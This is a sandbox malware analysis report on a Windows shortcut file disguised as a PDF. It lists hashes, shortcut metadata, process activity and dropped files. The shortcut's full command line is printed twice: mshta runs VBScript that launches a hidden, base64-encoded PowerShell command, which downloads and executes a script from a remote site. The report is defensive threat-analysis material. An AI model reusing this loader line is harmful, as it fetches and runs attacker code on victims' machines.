File name: | SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk |
Full analysis: | https://app.any.run/tasks/766df2a4-39bf-4d00-b123-6ccb3f7a595e |
Verdict: | Malicious activity |
Analysis date: | January 23, 2019, 07:22:33 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Fri Sep 29 12:41:16 2017, mtime=Fri Sep 29 12:41:16 2017, atime=Fri Sep 29 12:41:16 2017, length=14848, window=hide |
MD5: | EC0FB9D17EC77AD05F9A69879327E2F9 |
SHA1: | E11C241747E473B7ED980CF13A41EA7DF1EAE7F7 |
SHA256: | 8F4BC2518BAA580CA3AEC191FB2FBE7EC087B6B6BC722E54ABE3249ED85C9E4B |
SSDEEP: | 24:8DLVC5Uk7unX6m+/e2XMfga/uUCCpK7YGcyruHmg7Ii8A5lIyunhceUabrl:8nVPqZXMfgKuUCCpWfcyruHmg7Iidad |
.lnk | | | Windows Shortcut (100) |
---|
Flags: | IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpString |
---|---|
FileAttributes: | Archive |
CreateDate: | 2017:09:29 15:41:16+02:00 |
AccessDate: | 2017:09:29 15:41:16+02:00 |
ModifyDate: | 2017:09:29 15:41:16+02:00 |
TargetFileSize: | 14848 |
IconIndex: | (none) |
RunWindow: | Normal |
HotKey: | (none) |
TargetFileDOSName: | mshta.exe |
DriveType: | Fixed Disk |
VolumeLabel: | WIN10 |
LocalBasePath: | C:\Windows\System32\mshta.exe |
Description: | Type: Text Document |
RelativePath: | ..\..\..\Windows\System32\mshta.exe |
CommandLineArguments: | vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -e """"aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4AbwBwAHQAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA="""""", 0 : window.close") |
IconFileName: | .\128_2_21.docx |
MachineID: | oggy |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3128 | "C:\Windows\System32\mshta.exe" vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -e """"aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4AbwBwAHQAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA="""""", 0 : window.close") | C:\Windows\System32\mshta.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2228 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e "aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4AbwBwAHQAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA=" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2228 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1PPLM233YA4AQP575TJJ.temp | — | |
MD5:— | SHA256:— | |||
2228 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20e802.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2228 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |